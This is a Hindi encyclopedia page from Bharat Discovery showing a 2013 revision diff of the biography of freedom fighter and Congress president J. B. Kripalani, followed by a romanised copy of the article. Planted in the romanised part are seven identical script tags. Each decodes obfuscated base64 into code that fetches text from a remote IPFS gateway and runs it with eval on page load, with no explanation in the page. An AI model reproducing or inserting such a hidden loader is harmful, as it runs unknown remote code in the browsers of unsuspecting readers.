Difference between revisions of "जे. बी. कृपलानी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''जीवतराम भगवानदास कृपलानी''' ([[अंग्रेज़ी]]: J. B. Kripalani, जन्म- [[11 नवम्बर]], [[1888]], [[हैदराबाद]]; मृत्यु- [[19 मार्च]], [[1982]]) [[भारत]] के प्रसिद्ध स्वाधीनता सेनानी और राजनीतिज्ञ थे। उन्होंने एक शिक्षक के रूप में अपना व्यावसायिक जीवन प्रारम्भ किया था। राष्ट्रपिता [[महात्मा गाँधी]] से उनका निकट सम्पर्क था। वे 'गुजरात विद्यापीठ' के प्राचार्य भी रहे थे, तभी से उन्हें 'आचार्य कृपलानी' पुकारा जाने लगा था। हरिजन उद्धार के लिए कृपलानी जी निरंतर गाँधीजी के सहयोगी रहे। वे 'अखिल भारतीय राष्ट्रीय कांग्रेस' के महामंत्री तथा वर्ष [[1946]] की [[मेरठ]] [[कांग्रेस]] के अध्यक्ष भी रहे थे। उनकी पत्नी [[सुचेता कृपलानी]] भी [[उत्तर प्रदेश]] की मुख्यमंत्री रही थीं।
+
{{सूचना बक्सा राजनीतिज्ञ
{{tocright}}
+
|चित्र=J.B.Kripalani.jpg
 +
|चित्र का नाम=जे. बी. कृपलानी
 +
|पूरा नाम=आचार्य जीवतराम भगवानदास कृपलानी
 +
|अन्य नाम=आचार्य कृपलानी
 +
|जन्म=[[11 नवम्बर]], [[1888]]
 +
|जन्म भूमि=[[हैदराबाद]]
 +
|मृत्यु=[[19 मार्च]], [[1982]]
 +
|मृत्यु स्थान=
 +
|मृत्यु कारण=
 +
|अविभावक=काका भगवान दास (पिता)
 +
|पति/पत्नी= [[सुचेता कृपलानी]]
 +
|संतान=
 +
|स्मारक=
 +
|क़ब्र=
 +
|नागरिकता=भारतीय
 +
|प्रसिद्धि=स्वतंत्रतासेनानी और राजनीतिज्ञ
 +
|पार्टी=[[कांग्रेस]], किसान मजदूर प्रजा पार्टी
 +
|पद=कांग्रेस के अध्यक्ष
 +
|भाषा=
 +
|जेल यात्रा=
 +
|कार्य काल=
 +
|विद्यालय=फ़र्ग्यूसन कॉलेज, [[पुणे]]
 +
|शिक्षा=एम. ए.
 +
|पुरस्कार-उपाधि=
 +
|विशेष योगदान=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''जीवतराम भगवानदास कृपलानी''' ([[अंग्रेज़ी]]: ''Jivatram Bhagwandas Kripalani'', जन्म- [[11 नवम्बर]], [[1888]] ; मृत्यु- [[19 मार्च]], [[1982]]) [[भारत]] के प्रसिद्ध स्वतंत्रतासेनानी और राजनीतिज्ञ थे। उन्होंने एक शिक्षक के रूप में अपना व्यावसायिक जीवन प्रारम्भ किया था। राष्ट्रपिता [[महात्मा गाँधी]] से उनका निकट सम्पर्क था। वे 'गुजरात विद्यापीठ' के प्राचार्य भी रहे थे, तभी से उन्हें 'आचार्य कृपलानी' पुकारा जाने लगा था। हरिजन उद्धार के लिए कृपलानी जी निरंतर गाँधीजी के सहयोगी रहे। वे 'अखिल भारतीय राष्ट्रीय कांग्रेस' के महामंत्री तथा वर्ष [[1946]] की [[मेरठ]] [[कांग्रेस]] के अध्यक्ष भी रहे थे। उनकी पत्नी [[सुचेता कृपलानी]] भी [[उत्तर प्रदेश]] की [[मुख्यमंत्री]] रही थीं।
 
==जन्म तथा शिक्षा==
 
==जन्म तथा शिक्षा==
जे. बी. कृपलानी का जन्म 11 नवम्बर, 1888 को हैदराबाद ([[सिंध]]) में हुआ था। वे [[क्षत्रिय]] परिवार से सम्बन्ध रखते थे। उनके [[पिता]] काका भगवान दास तहसीलदार के पद पर नियुक्त थे। कृपलानी जी की शिक्षा सिंध और [[मुंबई]] के 'विल्सन कॉलेज' में आरंभ हुई। उन्होंने एम. ए. तक की शिक्षा [[पुणे]] के 'फ़र्ग्यूसन कॉलेज' से प्राप्त की थी, जिसकी स्थापना [[लोकमान्य तिलक]] और उनके साथियों ने की थी।
+
जे. बी. कृपलानी का जन्म 11 नवम्बर, 1888 को [[हैदराबाद]] ([[सिंध]]) में हुआ था। वे [[क्षत्रिय]] [[परिवार]] से सम्बन्ध रखते थे। उनके [[पिता]] काका भगवान दास तहसीलदार के पद पर नियुक्त थे। कृपलानी जी की शिक्षा सिंध और [[मुंबई]] के 'विल्सन कॉलेज' में आरंभ हुई। उन्होंने एम. ए. तक की शिक्षा [[पुणे]] के 'फ़र्ग्यूसन कॉलेज' से प्राप्त की थी, जिसकी स्थापना [[लोकमान्य तिलक]] और उनके साथियों ने की थी।[[चित्र:JB-Kripalani-stmap.jpg|thumb|left|सम्मान में जारी [[डाक टिकट]]]]
 
====व्यावसायिक जीवन की शुरुआत====
 
====व्यावसायिक जीवन की शुरुआत====
 
कृपलानी जी ने एक शिक्षक के रूप में अपना व्यावसायिक जीवन आंरभ किया था। सन [[1912]] से [[1917]] तक वे [[बिहार]] के मुजफ़्फ़रपुर कॉलेज में [[अंग्रेज़ी]] और [[इतिहास]] के प्रोफेसर रहे।
 
कृपलानी जी ने एक शिक्षक के रूप में अपना व्यावसायिक जीवन आंरभ किया था। सन [[1912]] से [[1917]] तक वे [[बिहार]] के मुजफ़्फ़रपुर कॉलेज में [[अंग्रेज़ी]] और [[इतिहास]] के प्रोफेसर रहे।
 
==गाँधीजी के सहयोगी==
 
==गाँधीजी के सहयोगी==
इन्हीं दिनों गाँधीजी ने चम्पारन की प्रसिद्ध यात्रा की थी और जे. बी. कृपलानी उनके निकट संपर्क में आए। वर्ष [[1919]]-[[1920]] में वे कुछ समय तक '[[काशी हिन्दू विश्वविद्यालय]]' में भी रहे और गाँधीजी के '[[असहयोग आंदोलन]]' के समय वहाँ से हट गए। 'असहयोग आंदोलन' आंरभ होने पर विद्यालयों का बहिष्कार करने वाले छात्रों के लिए गाँधीजी की प्ररेणा से कई प्रदेशों में विद्यापीठ स्थापित किए थे। जे. बी. कृपलानी 1920 से [[1927]] तक 'गुजरात विद्यापीठ' के प्रचार्य रहे। तभी से वे 'आचार्य़ कृपलानी' के नाम से प्रसिद्ध हुए।
+
इन्हीं दिनों गाँधीजी ने [[चम्पारन सत्याग्रह|चम्पारन]] की प्रसिद्ध यात्रा की थी और जे. बी. कृपलानी उनके निकट संपर्क में आए। वर्ष [[1919]]-[[1920]] में वे कुछ समय तक '[[काशी हिन्दू विश्वविद्यालय]]' में भी रहे और गाँधीजी के '[[असहयोग आंदोलन]]' के समय वहाँ से हट गए। 'असहयोग आंदोलन' आंरभ होने पर विद्यालयों का बहिष्कार करने वाले छात्रों के लिए गाँधीजी की प्ररेणा से कई प्रदेशों में विद्यापीठ स्थापित किए थे। जे. बी. कृपलानी 1920 से [[1927]] तक 'गुजरात विद्यापीठ' के प्रचार्य रहे। तभी से वे 'आचार्य़ कृपलानी' के नाम से प्रसिद्ध हुए।
 
====क्रांतिकारी गतिविधियाँ====
 
====क्रांतिकारी गतिविधियाँ====
सन 1927 के बाद आचार्य़ कृपलानी का जीवन पूर्ण रूप से स्वाधीनता संग्राम और [[गाँधीजी]] की रचनात्मक प्रवृत्तियों को आगे बढ़ाने में ही बीता। उन्होंने खादी और ग्राम उद्योगों को पुर्न:जीवित करने के लिए [[उत्तर प्रदेश]] में 'गाँधी आश्रम' नामक एक संस्था की स्थापना भी की। हरिजनों के उद्धार के लिए गाँधीजी की देशव्यापी यात्रा में वे बराबर उनके साथ रहे और इस दिशा में निरंतर अपने प्रयत्न जारी रखे। ये उनकी समाज सेवा की भावना ही थी, जो उन्हें राष्टपिता के इतने क़रीब ले आई। देश और समाज सेवा की निस्वार्थ भावना ने उन्हें देश की जनता के बीच लोकप्रिय बना दिया था।
+
सन 1927 के बाद आचार्य कृपलानी का जीवन पूर्ण रूप से स्वाधीनता संग्राम और [[गाँधीजी]] की रचनात्मक प्रवृत्तियों को आगे बढ़ाने में ही बीता। उन्होंने खादी और ग्राम उद्योगों को पुर्न:जीवित करने के लिए [[उत्तर प्रदेश]] में 'गाँधी आश्रम' नामक एक संस्था की स्थापना भी की। हरिजनों के उद्धार के लिए गाँधीजी की देशव्यापी यात्रा में वे बराबर उनके साथ रहे और इस दिशा में निरंतर अपने प्रयत्न जारी रखे। ये उनकी समाज सेवा की भावना ही थी, जो उन्हें राष्टपिता के इतने क़रीब ले आई। देश और समाज सेवा की निस्वार्थ भावना ने उन्हें देश की जनता के बीच लोकप्रिय बना दिया था।
 
==उच्च पद प्राप्ति==
 
==उच्च पद प्राप्ति==
 
[[1935]] से [[1945]] तक उन्होंने [[कांग्रेस]] के महासचिव के रूप में काम किया। वर्ष [[1946]] की [[मेरठ]] कांग्रेस के वे अध्यक्ष चुने गए थे। कई प्रश्नों पर [[पंडित जवाहरलाल नेहरू]] से मतभेद हो जाने कारण उन्होंने अध्यक्षता छोड़ दी और 'किसान मजदूर प्रजा पार्टी' बनाकर विपक्ष में चले गए। वे एकाधिक बार [[लोक सभा]] के सदस्य भी रहे।
 
[[1935]] से [[1945]] तक उन्होंने [[कांग्रेस]] के महासचिव के रूप में काम किया। वर्ष [[1946]] की [[मेरठ]] कांग्रेस के वे अध्यक्ष चुने गए थे। कई प्रश्नों पर [[पंडित जवाहरलाल नेहरू]] से मतभेद हो जाने कारण उन्होंने अध्यक्षता छोड़ दी और 'किसान मजदूर प्रजा पार्टी' बनाकर विपक्ष में चले गए। वे एकाधिक बार [[लोक सभा]] के सदस्य भी रहे।
 
====निधन====
 
====निधन====
जे. बी. कृपलानी ने सभी आंदोंलनों में भाग लिया था और जेल की सज़ाएँ भोगीं। देश की आज़ादी में महत्त्वपूर्ण योगदान देने वाले आचार्य कृपलानी जी का [[19]] मार्च, [[1982]] में निधन हुआ।
+
जे. बी. कृपलानी ने सभी आंदोंलनों में भाग लिया था और जेल की सज़ाएँ भोगीं। देश की आज़ादी में महत्त्वपूर्ण योगदान देने वाले आचार्य कृपलानी जी का [[19 मार्च]], [[1982]] में निधन हुआ।
  
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 23: Line 57:
 
[[Category:भारतीय राष्ट्रीय काँग्रेस अध्यक्ष]]
 
[[Category:भारतीय राष्ट्रीय काँग्रेस अध्यक्ष]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 10:48, 5 March 2013

je. bi. kripalani
poora nam achary jivataram bhagavanadas kripalani
any nam achary kripalani
janm 11 navambar, 1888
janm bhoomi haidarabad
mrityu 19 march, 1982
pati/patni sucheta kripalani
nagarikata bharatiy
prasiddhi svatantratasenani aur rajanitijn
parti kaangres, kisan majadoor praja parti
pad kaangres ke adhyaksh
shiksha em. e.
vidyalay fargyoosan k aaulej, pune

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jivataram bhagavanadas kripalani (aangrezi: Jivatram Bhagwandas Kripalani, janm- 11 navambar, 1888 ; mrityu- 19 march, 1982) bharat ke prasiddh svatantratasenani aur rajanitijn the. unhoanne ek shikshak ke roop mean apana vyavasayik jivan prarambh kiya tha. rashtrapita mahatma gaandhi se unaka nikat sampark tha. ve 'gujarat vidyapith' ke prachary bhi rahe the, tabhi se unhean 'achary kripalani' pukara jane laga tha. harijan uddhar ke lie kripalani ji nirantar gaandhiji ke sahayogi rahe. ve 'akhil bharatiy rashtriy kaangres' ke mahamantri tatha varsh 1946 ki merath kaangres ke adhyaksh bhi rahe the. unaki patni sucheta kripalani bhi uttar pradesh ki mukhyamantri rahi thian.

janm tatha shiksha

je. bi. kripalani ka janm 11 navambar, 1888 ko haidarabad (siandh) mean hua tha. ve kshatriy parivar se sambandh rakhate the. unake pita kaka bhagavan das tahasiladar ke pad par niyukt the. kripalani ji ki shiksha siandh aur muanbee ke 'vilsan k aaulej' mean aranbh huee. unhoanne em. e. tak ki shiksha pune ke 'fargyoosan k aaulej' se prapt ki thi, jisaki sthapana lokamany tilak aur unake sathiyoan ne ki thi.[[chitr:JB-Kripalani-stmap.jpg|thumb|left|samman mean jari dak tikat]]

vyavasayik jivan ki shuruat

kripalani ji ne ek shikshak ke roop mean apana vyavasayik jivan aanrabh kiya tha. san 1912 se 1917 tak ve bihar ke mujaffarapur k aaulej mean aangrezi aur itihas ke prophesar rahe.

gaandhiji ke sahayogi

inhian dinoan gaandhiji ne champaran ki prasiddh yatra ki thi aur je. bi. kripalani unake nikat sanpark mean ae. varsh 1919-1920 mean ve kuchh samay tak 'kashi hindoo vishvavidyalay' mean bhi rahe aur gaandhiji ke 'asahayog aandolan' ke samay vahaan se hat ge. 'asahayog aandolan' aanrabh hone par vidyalayoan ka bahishkar karane vale chhatroan ke lie gaandhiji ki prarena se kee pradeshoan mean vidyapith sthapit kie the. je. bi. kripalani 1920 se 1927 tak 'gujarat vidyapith' ke prachary rahe. tabhi se ve 'achary़ kripalani' ke nam se prasiddh hue.

kraantikari gatividhiyaan

san 1927 ke bad achary kripalani ka jivan poorn roop se svadhinata sangram aur gaandhiji ki rachanatmak pravrittiyoan ko age badhane mean hi bita. unhoanne khadi aur gram udyogoan ko purn:jivit karane ke lie uttar pradesh mean 'gaandhi ashram' namak ek sanstha ki sthapana bhi ki. harijanoan ke uddhar ke lie gaandhiji ki deshavyapi yatra mean ve barabar unake sath rahe aur is disha mean nirantar apane prayatn jari rakhe. ye unaki samaj seva ki bhavana hi thi, jo unhean rashtapita ke itane qarib le aee. desh aur samaj seva ki nisvarth bhavana ne unhean desh ki janata ke bich lokapriy bana diya tha.

uchch pad prapti

1935 se 1945 tak unhoanne kaangres ke mahasachiv ke roop mean kam kiya. varsh 1946 ki merath kaangres ke ve adhyaksh chune ge the. kee prashnoan par pandit javaharalal neharoo se matabhed ho jane karan unhoanne adhyakshata chho d di aur 'kisan majadoor praja parti' banakar vipaksh mean chale ge. ve ekadhik bar lok sabha ke sadasy bhi rahe.

nidhan

je. bi. kripalani ne sabhi aandoanlanoan mean bhag liya tha aur jel ki sazaean bhogian. desh ki azadi mean mahattvapoorn yogadan dene vale achary kripalani ji ka 19 march, 1982 mean nidhan hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>